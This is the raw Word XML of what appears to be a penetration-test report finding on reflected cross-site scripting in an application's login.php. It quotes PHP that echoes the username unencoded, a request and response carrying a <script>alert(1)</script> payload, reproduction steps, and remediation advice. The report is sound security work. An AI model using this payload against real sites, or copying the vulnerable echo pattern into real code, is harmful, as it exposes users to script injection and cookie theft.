    <w:p w14:paraId="2F0864BC" w14:textId="73B163F5" w:rsidR="00A154A9" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310FEBDA" w14:textId="188E2BEE" w:rsidR="00A154A9" w:rsidRPr="00A154A9" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
      <w:r>
        <w:t>An attacker could leverage this vulnerability to run scripts in the context of a logged-in user who clicked on their malicious URL, as well as to steal cookie data and other sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4385CDEE" w14:textId="77777777" w:rsidR="00A154A9" w:rsidRDefault="00A154A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="621B6C82" w14:textId="15504578" w:rsidR="00A154A9" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2539A068" w14:textId="01DD3C47" w:rsidR="000A4289" w:rsidRDefault="00A154A9" w:rsidP="000A4289">
      <w:r>
        <w:t xml:space="preserve">The login page of the NBN web application displays an error message after failed login attempts. The error message includes the username submitted during the login attempt. The below figure shows the code used to display the error message in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A154A9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A154A9" w14:paraId="14335468" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="3EC7B335" w14:textId="77777777" w:rsidR="00A154A9" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>// Get username</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E32BE8A" w14:textId="2132F6E1" w:rsidR="00A154A9" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>$user = $_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>GET[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 'username' ];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BC47625" w14:textId="3B35E0AB" w:rsidR="00A154A9" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$user = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mysqli_real_escape_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>string</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>$conn, $user);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AF54441" w14:textId="77777777" w:rsidR="00A154A9" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E485126" w14:textId="77777777" w:rsidR="00A154A9" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>// Check the database</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="775DE8FB" w14:textId="1CF8CC2D" w:rsidR="00A154A9" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>query  =</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68BFDEA4" w14:textId="0FBD9BD7" w:rsidR="00A154A9" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$result = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mysqli_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>query</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">$conn, $query) or die( '&lt;pre&gt;' . </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mysqli_error</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>($conn</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>) .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> '&lt;/pre&gt;</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>' )</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23CD245A" w14:textId="78103123" w:rsidR="00A154A9" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>if( $</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">result &amp;&amp; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mysqli_num_rows</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>($result) &gt; 0 ) {    // Login Successful...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FF86452" w14:textId="203A0819" w:rsidR="00A154A9" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>setcookie</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"authenticated", "1");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="472D462D" w14:textId="6D556EA3" w:rsidR="00A154A9" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>header(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>'Location: /internal/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>employee.php?name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>='.$user);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EEA0284" w14:textId="01824EF7" w:rsidR="00A154A9" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>} else {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="626F5772" w14:textId="7F1C14FF" w:rsidR="00A154A9" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         // Login failed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="647A93EB" w14:textId="735E6E79" w:rsidR="00A154A9" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>setcookie</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"authenticated", "0");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAF03D8" w14:textId="737526E1" w:rsidR="00A154A9" w:rsidRPr="00B40A5B" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>error_message</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = "Login failed. Query: </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>".$</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>query;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1039D295" w14:textId="52CF3EE8" w:rsidR="00A154A9" w:rsidRDefault="00A154A9" w:rsidP="00A154A9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Error Message in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="129C030C" w14:textId="4504E304" w:rsidR="00A154A9" w:rsidRDefault="00A154A9" w:rsidP="000A4289">
      <w:r>
        <w:t xml:space="preserve">The value of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00547413">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="00547413">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameter is sanitized before it is inserted into the </w:t>
      </w:r>
      <w:r w:rsidRPr="00547413">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> string</w:t>
      </w:r>
      <w:r w:rsidR="00547413">
        <w:t xml:space="preserve">. However, it was still possible for the assessment team to inject malicious code into the URL that would execute when the browser attempted to load the page. By inserting </w:t>
      </w:r>
      <w:r w:rsidR="00547413" w:rsidRPr="00547413">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00547413">
        <w:t xml:space="preserve"> tags and JavaScript content into the </w:t>
      </w:r>
      <w:r w:rsidR="00547413" w:rsidRPr="00547413">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidR="00547413">
        <w:t xml:space="preserve"> parameter, they forced the browser to execute an alert, shown in the following figure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188E0481" w14:textId="525C6B5C" w:rsidR="00547413" w:rsidRPr="00547413" w:rsidRDefault="00547413" w:rsidP="00547413">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CB80774" wp14:editId="371AA834">
            <wp:extent cx="5943600" cy="1619250"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
            <wp:docPr id="20954731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319" name="Picture 9"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Alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39303483" w14:textId="15A778F4" w:rsidR="00335D96" w:rsidRDefault="00335D96" w:rsidP="00547413">
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00547413">
        <w:t xml:space="preserve"> following figures show the request to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00547413">
        <w:t>payloaded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00547413">
        <w:t xml:space="preserve"> URL and the application response containing the embedded script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095B5099" w14:textId="77777777" w:rsidR="00335D96" w:rsidRPr="00F62F5D" w:rsidRDefault="00335D96" w:rsidP="00335D96">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335D96" w14:paraId="5D621B67" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="3096EF77" w14:textId="77777777" w:rsidR="00547413" w:rsidRDefault="00547413" w:rsidP="00547413">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>GET /login.php</w:t>
            </w:r>
            <w:r w:rsidRPr="00547413">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>?username=%3Cscript%3Ealert%281%29%3C%2Fscript%3E</w:t>
            </w:r>
            <w:r>
              <w:t>&amp;password=a&amp;Login=Enter HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="296D6DEA" w14:textId="77777777" w:rsidR="00547413" w:rsidRDefault="00547413" w:rsidP="00547413">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Host: 10.10.0.66</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CB4565D" w14:textId="661E80FF" w:rsidR="00335D96" w:rsidRPr="00F62F5D" w:rsidRDefault="00547413" w:rsidP="00547413">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="22B7A290" w14:textId="77777777" w:rsidR="00547413" w:rsidRDefault="00547413" w:rsidP="00335D96">
      <w:pPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42E7F1EA" w14:textId="77777777" w:rsidR="00547413" w:rsidRDefault="00547413">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C234BC" w14:textId="79E43591" w:rsidR="00335D96" w:rsidRPr="00F62F5D" w:rsidRDefault="00335D96" w:rsidP="00335D96">
      <w:pPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62F5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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335D96" w14:paraId="71096272" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="25AADABC" w14:textId="77777777" w:rsidR="00244E22" w:rsidRDefault="00244E22" w:rsidP="00244E22">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>HTTP/1.1 200 OK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2696136C" w14:textId="77777777" w:rsidR="00244E22" w:rsidRDefault="00244E22" w:rsidP="00244E22">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Date: Thu, 27 Apr 2023 19:10:08 GMT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6673E7C1" w14:textId="77777777" w:rsidR="00244E22" w:rsidRDefault="00244E22" w:rsidP="00244E22">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="078EC8EF" w14:textId="77777777" w:rsidR="00244E22" w:rsidRDefault="00244E22" w:rsidP="00244E22">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>&lt;div class="container"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BBF28EF" w14:textId="77777777" w:rsidR="00244E22" w:rsidRDefault="00244E22" w:rsidP="00244E22">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>&lt;header class="major"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F91FD77" w14:textId="77777777" w:rsidR="00244E22" w:rsidRDefault="00244E22" w:rsidP="00244E22">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>&lt;h2&gt;Login&lt;/h2&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41DAF3DF" w14:textId="77777777" w:rsidR="00244E22" w:rsidRDefault="00244E22" w:rsidP="00244E22">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">Login failed. Query: SELECT * FROM `users` WHERE </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53E2FFDD" w14:textId="77777777" w:rsidR="00244E22" w:rsidRDefault="00244E22" w:rsidP="00244E22">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t xml:space="preserve">             </w:t>
            </w:r>
            <w:r w:rsidRPr="00244E22">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>user = '&lt;script&gt;alert(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00244E22">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>1)&lt;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00244E22">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>/script&gt;'</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> AND password =</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">                </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EB59140" w14:textId="43DF9D51" w:rsidR="00244E22" w:rsidRDefault="00244E22" w:rsidP="00244E22">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             </w:t>
            </w:r>
            <w:r>
              <w:t>'0cc175b9c0f1b6a831c399e269772661';</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>&lt;/header&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="769227FA" w14:textId="77777777" w:rsidR="00244E22" w:rsidRDefault="00244E22" w:rsidP="00244E22">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>&lt;p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="476B0E1E" w14:textId="601498F4" w:rsidR="00335D96" w:rsidRPr="00B40A5B" w:rsidRDefault="00244E22" w:rsidP="00244E22">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1012AF8B" w14:textId="77777777" w:rsidR="00335D96" w:rsidRDefault="00335D96" w:rsidP="00335D96">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EC0DE88" w14:textId="7FE8DA0D" w:rsidR="00244E22" w:rsidRPr="00244E22" w:rsidRDefault="00244E22" w:rsidP="00335D96">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>An attacker would be able to use this vulnerability to execute JavaScript code in the browser of any user who clicked on a specially crafted URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC96BC7" w14:textId="74A3109A" w:rsidR="00335D96" w:rsidRDefault="00335D96" w:rsidP="00335D96">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40389D44" w14:textId="0C551AAF" w:rsidR="00335D96" w:rsidRDefault="00335D96" w:rsidP="00244E22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Replace the value </w:t>
      </w:r>
      <w:r w:rsidR="00244E22">
        <w:t xml:space="preserve">of the vulnerable URL parameter with malicious </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00244E22">
        <w:t>JavasScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00244E22">
        <w:t xml:space="preserve"> code</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F609CD" w14:textId="77777777" w:rsidR="00335D96" w:rsidRDefault="00335D96" w:rsidP="00335D96">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Ex:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E2DDFB" w14:textId="5198FE6C" w:rsidR="00335D96" w:rsidRDefault="00244E22" w:rsidP="00335D96">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00244E22">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/login.php?username=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&amp;password=a&amp;Login=Enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156ABE3A" w14:textId="77777777" w:rsidR="00335D96" w:rsidRDefault="00335D96" w:rsidP="00335D96">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="23"/>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AF31BA" w14:textId="1CA162CF" w:rsidR="00244E22" w:rsidRDefault="00244E22" w:rsidP="00244E22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use contextual entity encoding to convert script code into harmless output for any application that includes user-supplied input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3676BC5D" w14:textId="534C21C7" w:rsidR="00244E22" w:rsidRDefault="00244E22" w:rsidP="00244E22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Consider all user unput untrusted and perform server-side validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6ACA6D" w14:textId="3022C696" w:rsidR="00244E22" w:rsidRPr="00244E22" w:rsidRDefault="00244E22" w:rsidP="00244E22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Implement modern browser headers such as Content Security Policy (CSP), which can provide robust protection against XSS and other content injection issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B107AF5" w14:textId="77777777" w:rsidR="00335D96" w:rsidRDefault="00335D96" w:rsidP="00335D96">
